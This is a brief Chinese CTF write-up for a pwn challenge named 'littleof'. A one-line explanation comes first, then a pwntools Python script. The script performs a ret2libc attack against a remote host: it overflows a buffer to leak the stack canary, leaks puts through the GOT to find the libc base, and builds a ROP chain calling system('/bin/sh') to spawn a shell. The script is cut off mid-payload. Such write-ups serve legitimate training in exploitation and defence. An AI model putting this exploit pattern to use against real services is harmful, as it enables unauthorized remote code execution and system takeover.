littleof
白给的ret2libc, 第一个输出泄露canary, 第二个输出泄露libc基址顺便控制一下返回地址再返回去输入, 之后就getshell咯(摊手)
#!/usr/bin/env python
#coding=utf-8
from pwn import*
sh = remote("182.116.62.85", 27056)
#sh = process('./littleof')
elf = ELF('./littleof')
libc = ELF('./libc-2.27.so')
#libc = elf.libc
context.log_level='debug'
pop_rdi_ret = 0x0400863
main_addr = 0x0400789
pop_rsi_r15_ret = 0x0400861
payload = 'A'*(0x50-8)
sh.recvuntil("?")
sh.sendline(payload)
sh.recvuntil("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA")
canary = u64(sh.recv(8).ljust(8,b'\x00'))
canary = canary - 0x0a
payload = 'a'*(0x50-8) + p64(canary) + 'b'*8 + p64(pop_rdi_ret) + p64(elf.got['puts']) + p64(elf.plt['puts']) + p64(main_addr)
sh.recvuntil("!")
sh.sendline(payload)
leak = u64(sh.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
libc_base = leak - libc.symbols['puts']
sys_addr = libc_base + libc.symbols['system']
binsh_addr = libc_base + libc.search('/bin/sh\x00').next()
payload = 'D'*(0x50-8)
sh.recvuntil("?")
sh.sendline(payload)
sh.recv()
payload = 'c'*(0x50-8) + p64(canary) + 'd'*8 + p64(pop_rdi_ret) + p64(binsh_addr) + p64